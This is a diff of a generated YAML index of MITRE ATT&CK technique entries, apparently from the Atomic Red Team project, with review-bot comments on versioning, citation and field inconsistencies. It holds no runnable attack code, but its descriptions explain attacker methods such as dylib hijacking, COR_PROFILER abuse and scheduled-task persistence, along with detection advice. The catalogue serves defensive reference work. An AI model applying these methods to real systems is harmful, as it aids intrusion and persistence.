- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:09:17.363Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Netsh Helper DLL'
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -23851,12 +24172,11 @@ privilege-escalation:
- SYSTEM
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.007
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -23940,11 +24260,10 @@ privilege-escalation:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -23996,9 +24315,8 @@ privilege-escalation:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
T1574.012:
@@ -24047,7 +24365,7 @@ privilege-escalation:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -24085,30 +24403,29 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
execution:
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
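Review bot: the added sentence `Adversaries may also utilize the Powershell Cmdlet \`Invoke-CimMethod\`` should read `PowerShell cmdlet` for consistency with the product name, and this rewrite silently drops the earlier sentence about the deprecated `at` utility (`though at.exe can not access tasks created with schtasks or the Control Panel`), so the cross-reference from Scheduled Task to the At sub-technique is gone. Upstream wording, so not fixable in this index, but worth noting in the changelog.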
@@ -24155,7 +24472,7 @@ execution:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -24187,8 +24504,8 @@ execution:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -24202,6 +24519,10 @@ execution:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
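Review bot: the new `Red Canary - Atomic Red Team` reference URL points at `atomics/T1053.005/T1053.005.md` in this very repository, so the ATT&CK description now cites the project that embeds it, a circular citation. Nothing to change in a generated index, but maintainers should not treat it as an independent source for the `Invoke-CimMethod` / `PS_ScheduledTask` claim.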
@@ -24214,16 +24535,19 @@ execution:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1047:
technique:
- modified: '2024-04-11T18:13:25.130Z'
+ modified: '2024-10-15T15:20:57.328Z'
name: Windows Management Instrumentation
description: |-
Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
@@ -24289,7 +24613,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1047
atomic_tests: []
T1129:
@@ -24366,66 +24689,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1129
atomic_tests: []
T1059.007:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Cody Thomas, SpecterOps
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
- type: attack-pattern
- created: '2020-06-23T19:12:24.924Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1059.007
- url: https://attack.mitre.org/techniques/T1059/007
- - source_name: NodeJS
- url: https://nodejs.org/
- description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
- - source_name: JScrip May 2018
- url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
- description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
- June 23, 2020.
- - source_name: Microsoft JScript 2007
- url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
- description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
- ECMAScript …. Retrieved June 23, 2020.
- - source_name: Microsoft Windows Scripts
- url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
- description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
- June 23, 2020.
- - source_name: Apple About Mac Scripting 2016
- url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
- description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
- 14, 2021.
- - source_name: SpecterOps JXA 2020
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
- 2021.
- - source_name: SentinelOne macOS Red Team
- url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
- description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
- APIs Without Building Binaries. Retrieved July 17, 2020.'
- - source_name: Red Canary Silver Sparrow Feb2021
- url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
- description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
- wings: Outing macOS malware before it takes flight. Retrieved April 20,
- 2021.'
- - source_name: MDSec macOS JXA and VSCode
- url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
- description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
- with VSCode Extensions. Retrieved April 20, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-07-30T14:12:52.698Z'
name: 'Command and Scripting Interpreter: JavaScript'
description: |-
Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
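Review bot: most of this hunk is key reordering rather than data change: `x_mitre_platforms`, `x_mitre_domains`, `external_references` and friends are removed here only to reappear lower in the same object, so the substantive edits (the `modified` bump from `2022-04-25T14:00:00.188Z` to `2024-07-30T14:12:52.698Z`) are hard to pick out. If the generator emits keys in whatever order the upstream STIX bundle uses, a stable key sort before dumping would keep future diffs reviewable.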
@@ -24438,31 +24706,83 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_contributors:
+ - Cody Thomas, SpecterOps
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
Monitor for execution of JXA through osascript
and usage of OSAScript
API that may be related to other suspicious behavior occurring on the system.
Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- 'Script: Script Execution'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
+ created: '2020-06-23T19:12:24.924Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1059/007
+ external_id: T1059.007
+ - source_name: Apple About Mac Scripting 2016
+ description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
+ 14, 2021.
+ url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
+ - source_name: MDSec macOS JXA and VSCode
+ description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
+ with VSCode Extensions. Retrieved April 20, 2021.
+ url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
+ - source_name: Microsoft JScript 2007
+ description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
+ ECMAScript …. Retrieved June 23, 2020.
+ url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
+ - source_name: Microsoft Windows Scripts
+ description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
+ June 23, 2020.
+ url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
+ - source_name: JScrip May 2018
+ description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
+ June 23, 2020.
+ url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
+ - source_name: NodeJS
+ description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
+ url: https://nodejs.org/
+ - source_name: SentinelOne macOS Red Team
+ description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
+ APIs Without Building Binaries. Retrieved July 17, 2020.'
+ url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
+ - source_name: SpecterOps JXA 2020
+ description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
+ 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: Red Canary Silver Sparrow Feb2021
+ description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
+ wings: Outing macOS malware before it takes flight. Retrieved April 20,
+ 2021.'
+ url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1059.007
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
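Review bot: this hunk silently drops `x_mitre_permissions_required` (the `User` / `Administrator` / `SYSTEM` list) from T1059.007 while adding `x_mitre_deprecated: false`, `revoked: false` and `x_mitre_remote_support: false`, and raises `x_mitre_attack_spec_version` from `2.1.0` to `3.2.0` alongside the technique version `'2.1'` to `'2.2'`. Removing a field is a consumer-visible change; confirm it mirrors the upstream object rather than a lossy regeneration, and make sure anything that reads `x_mitre_permissions_required` treats it as optional.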
@@ -24520,9 +24840,8 @@ execution:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1559.002:
@@ -24614,20 +24933,19 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1559.002
atomic_tests: []
T1204.002:
technique:
- modified: '2023-04-21T12:22:19.740Z'
+ modified: '2024-09-25T20:50:34.876Z'
name: 'User Execution: Malicious File'
description: "An adversary may rely upon a user opening a malicious file in
order to gain execution. Users may be subjected to social engineering to get
them to open a file that will lead to code execution. This user action will
typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).
Adversaries may use several types of files that require a user to execute
- them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries
- may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
+ them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and
+ .reg.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)
to increase the likelihood that a user will open and successfully execute
a malicious file. These methods may include using a familiar naming convention
@@ -24655,7 +24973,7 @@ execution:
- Linux
- macOS
- Windows
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -24675,33 +24993,13 @@ execution:
url: https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1204.002
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -24718,6 +25016,7 @@ execution:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -24728,9 +25027,13 @@ execution:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -24738,8 +25041,24 @@ execution:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
T1559.001:
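Review bot: `x_mitre_permissions_required:` / `- User` survives here for T1053.003 as unchanged context, whereas the same field is deleted for T1059.007 and T1569.001 elsewhere in this patch. Either the upstream objects genuinely differ or the regeneration is inconsistent; worth a spot check against the source bundle before merging, since a field that is present for some techniques and absent for others complicates any consumer that keys on it.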
@@ -24779,7 +25098,7 @@ execution:
description: Nelson, M. (2017, January 5). Lateral Movement using the MMC20
Application COM Object. Retrieved November 21, 2017.
source_name: Enigma MMC20 COM Jan 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-07-26T22:51:20.448Z'
name: Component Object Model
description: |-
Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
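Review bot: the `modified` timestamp for T1559.001 moves backwards, from `'2022-04-25T14:00:00.188Z'` to `'2021-07-26T22:51:20.448Z'`. A regenerated object should not become older than the one it replaces; this looks like the technique was pulled from a different or stale bundle, so confirm which upstream source produced this object before accepting the change.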
@@ -24804,12 +25123,10 @@ execution:
- 'Script: Script Execution'
- 'Process: Process Creation'
x_mitre_remote_support: true
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
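Review bot: the removal of both `- spec_version: '2.1'` and `- x_mitre_attack_spec_version: 2.1.0` from T1559.001 leaves that object with no ATT&CK spec version at all, unlike every other technique in this patch, which is bumped to `x_mitre_attack_spec_version: 3.2.0`. Together with the backwards `modified` date in the preceding hunk this suggests the T1559.001 object was not regenerated from the same bundle as its neighbours; the two fields should either be restored or the discrepancy explained in the commit message.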
@@ -24889,11 +25206,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.002:
technique:
- modified: '2024-03-01T19:06:05.126Z'
+ modified: '2024-10-15T14:18:20.087Z'
name: 'Command and Scripting Interpreter: AppleScript'
description: |-
Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
@@ -24953,12 +25269,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.002
atomic_tests: []
T1106:
technique:
- modified: '2023-10-13T16:01:07.538Z'
+ modified: '2024-09-12T15:25:57.058Z'
name: Native API
description: |-
Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
@@ -25056,9 +25371,9 @@ execution:
2021.
url: https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
- source_name: Microsoft Win32
description: Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved
March 15, 2020.
@@ -25075,19 +25390,18 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1106
atomic_tests: []
T1059.010:
technique:
- modified: '2024-04-10T16:05:22.456Z'
+ modified: '2024-04-28T15:58:48.119Z'
name: AutoHotKey & AutoIT
description: |-
Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
- These scripts may also be compiled into self-contained exectuable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
+ These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
@@ -25096,7 +25410,7 @@ execution:
- Liran Ravich, CardinalOps
- Serhii Melnyk, Trustwave SpiderLabs
- Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
- - Monty
+ - "@_montysecurity"
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -25133,11 +25447,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:44:20.143Z'
name: Cloud API
description: "Adversaries may abuse cloud APIs to execute malicious commands.
APIs available in cloud environments provide various functionalities and are
@@ -25174,11 +25487,10 @@ execution:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
x_mitre_remote_support: false
